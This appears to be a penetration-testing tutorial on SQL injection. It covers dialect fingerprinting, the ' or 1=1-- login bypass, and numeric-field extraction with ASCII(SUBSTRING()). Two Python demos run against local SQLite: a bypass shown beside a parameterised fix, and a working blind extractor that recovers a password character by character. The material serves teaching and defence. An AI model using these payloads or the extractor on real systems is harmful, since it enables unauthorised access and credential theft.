It is worth pointing out once more that no input-filtering technique on its own can protect a vulnerable application against SQL injection. In most situations a vulnerable application does implement various input filters, but these filters can usually be bypassed and the injection still performed.
Understanding the query that runs in the background, and the type of database behind it, is essential before attempting SQL injection.

Fingerprinting the Database:-

The idea is to inject an expression that the target database evaluates back to the original value. If the application responds exactly as it did for the plain value, the database understood that dialect. String concatenation is spelled differently in each database, so for a string field whose original value is 'Triadsquare':

MySQL: 'Triad' 'square' (remember the space: MySQL concatenates adjacent string literals)
Oracle: 'Triad'||'square'
MS-SQL: 'Triad'+'square'

This only works for string fields. To fingerprint through a numeric field, append to the original number an expression that evaluates to zero but is only valid in one dialect (for example 5+CONNECTION_ID()-CONNECTION_ID() in place of 5):

MySQL: CONNECTION_ID() - CONNECTION_ID()
Oracle: BITAND(1, 1) - BITAND(1, 1)
MS-SQL: @@PACK_RECEIVED - @@PACK_RECEIVED
The most common injection people try is ' or 1=1-- (in MySQL the -- comment must be followed by a space). Suppose the application builds its login query like this:

select * from usertable where username='pranab' and password='tsi'

When the attacker submits ' or 1=1-- as the username, the application runs

select * from usertable where username='' or 1=1-- ' and password='tsi'

The single quote closes the string, or 1=1 is always true, and -- comments out the rest of the query, including the password check. If the attacker already knows a username, pranab'-- is enough:

select * from usertable where username='pranab'-- ' and password='tsi'

So basically the attacker can write his own SQL after the closing single quote, as in the example below.

Example:-

' or 1=1 --

Understanding the attack surface is very important: the pen tester should know exactly what will happen when the query executes.
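The following is an added example, not code from the original post: it reproduces the login bypass above against an in-memory SQLite database using Python's sqlite3 module, with the string-concatenated query beside the parameterised one that is immune to it. The table layout and the single user row are constructed for the demonstration.

```python
import sqlite3

# Constructed sample data for the demonstration: one user row.
USERS = [("pranab", "tsi")]


def make_db():
    """Create an in-memory SQLite database holding usertable."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE usertable (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO usertable VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation, the pattern described
    in the post. Returns the matching usernames (non-empty = logged in)."""
    query = ("SELECT username FROM usertable WHERE username='" + username
             + "' AND password='" + password + "'")
    # With "' or 1=1--" as username the statement becomes
    #   ... WHERE username='' or 1=1--' AND password='...'
    # and everything after -- is a comment, so every row matches.
    return [row[0] for row in conn.execute(query)]


def login_safe(conn, username, password):
    """Same check with bound parameters: input can never alter the SQL."""
    rows = conn.execute(
        "SELECT username FROM usertable WHERE username=? AND password=?",
        (username, password))
    return [row[0] for row in rows]


if __name__ == "__main__":
    conn = make_db()
    print(login_vulnerable(conn, "' or 1=1--", "wrong"))  # ['pranab']
    print(login_vulnerable(conn, "pranab'--", "wrong"))   # ['pranab']
    print(login_safe(conn, "' or 1=1--", "wrong"))        # []
```

SQLite accepts a bare -- at the end of the statement; against MySQL the same payload needs a trailing space after the comment marker, which is why testers often send ' or 1=1-- followed by a space, or use # instead.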

Retrieving Data as Number

It is fairly common to find that no string field in an application is vulnerable to SQL injection, because input containing a single quotation mark is handled properly. A vulnerability may still exist in a numeric field, because numeric data does not need to be enclosed in single quotes, so the attacker needs no quote character at all.

Here we can inject queries that retrieve data in numeric form, using two functions:

ASCII (returns the ASCII code of the input character)
SUBSTRING (returns a substring of its input)

Used together, they turn any single character of a string into a number that fits in a numeric field.

Example:-

SUBSTRING('Pranab', 1, 1) returns P
ASCII('P') returns 80
So
ASCII(SUBSTRING('Pranab', 1, 1)) returns 80

Using these functions we can cut a string systematically into its individual characters and return each of them separately as a number.
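The following is an added example, not code from the original post, showing the general form of the technique just described: a numeric parameter is concatenated unquoted into a query, and ASCII(SUBSTRING(...)) is used to pull a password out one character at a time with a payload that contains no quote character. It goes beyond the single lookup in the text by driving a binary search over the character code, which is how this is done in practice against a page that only reveals whether a row was displayed. The tables, rows and the product page function are constructed for the demonstration; SQLite spells ASCII() as unicode(), whereas MySQL, Oracle and MS-SQL use ASCII().

```python
import sqlite3

# Constructed sample data for the demonstration (not from the original post).
SECRET_PASSWORD = "tsi"


def make_db():
    """In-memory SQLite database: a products table the page displays from,
    and the usertable whose contents the attacker wants."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
    conn.execute("INSERT INTO products VALUES (1, 'Widget')")
    conn.execute("CREATE TABLE usertable (username TEXT, password TEXT)")
    conn.execute("INSERT INTO usertable VALUES ('pranab', ?)", (SECRET_PASSWORD,))
    return conn


def product_page(conn, product_id):
    """Simulated vulnerable page: the numeric id is concatenated unquoted,
    so any SQL expression that yields a number is accepted.
    Returns True when a product row would be displayed."""
    query = "SELECT name FROM products WHERE id=" + product_id
    return conn.execute(query).fetchone() is not None


def extract_char(conn, position):
    """Recover one character of the password as its character code.
    Each probe injects  1 AND <code> > <guess>  and observes whether the
    product is still shown; a binary search over 0..127 needs 7 probes.
    The payload uses LIMIT instead of a quoted WHERE clause, so it contains
    no single quote at all."""
    lo, hi = 0, 127  # the code lies within [lo, hi]
    while lo < hi:
        mid = (lo + hi) // 2
        payload = ("1 AND unicode(substr((SELECT password FROM usertable "
                   "LIMIT 1), %d, 1)) > %d" % (position, mid))
        if product_page(conn, payload):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(conn, max_len=32):
    """Pull characters until substr() runs past the end: unicode('') is
    NULL in SQLite, every comparison is then false and the search
    converges on 0, which marks the end of the string."""
    out = ""
    for pos in range(1, max_len + 1):
        code = extract_char(conn, pos)
        if code == 0:
            break
        out += chr(code)
    return out


if __name__ == "__main__":
    conn = make_db()
    print(extract_string(conn))  # tsi
```

Seven probes per character is the cost of inferring a number through a yes/no page; where the application echoes a numeric value back directly, the injected ASCII(SUBSTRING(...)) expression can be read off in a single request instead.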

USE OF SUBSTRING:-

SUBSTR (string, start position, [LENGTH])

String is the source string.
"Start position" is the position in the source string where you want to start extracting characters. The first position in the string is always 1, NOT 0, as in many other languages.
Length is optional. It is the number of characters to extract.
If this parameter is omitted, substr returns the rest of the string from the start position.
Notes (these are Oracle's SUBSTR rules; MySQL's SUBSTR and MS-SQL's SUBSTRING differ in how they treat a start position of 0, and MS-SQL's SUBSTRING requires the length argument):

If the start position is specified as 0, substr treats it as 1, that is, as the first position in the string.
If the start position is a positive number, then substr counts from the beginning of the string.
If the start position is a negative number, then substr counts backwards from the end of the string.
If the length is a negative number, then substr returns NULL.

Examples (with the source string 'Triadsquare Infosec Pvt Ltd.', 28 characters):-

  • substr('Triadsquare Infosec Pvt Ltd.', 13, 7) will return 'Infosec'
  • substr('Triadsquare Infosec Pvt Ltd.', 13) will return 'Infosec Pvt Ltd.'
  • substr('Triadsquare Infosec Pvt Ltd.', 1, 11) will return 'Triadsquare'
  • substr('Triadsquare Infosec Pvt Ltd.', 0, 11) will return 'Triadsquare'
  • substr('Triadsquare Infosec Pvt Ltd.', -4, 3) will return 'Ltd'
  • substr('Triadsquare Infosec Pvt Ltd.', -16, 7) will return 'Infosec'
  • substr('Triadsquare Infosec Pvt Ltd.', -16, 3) will return 'Inf'
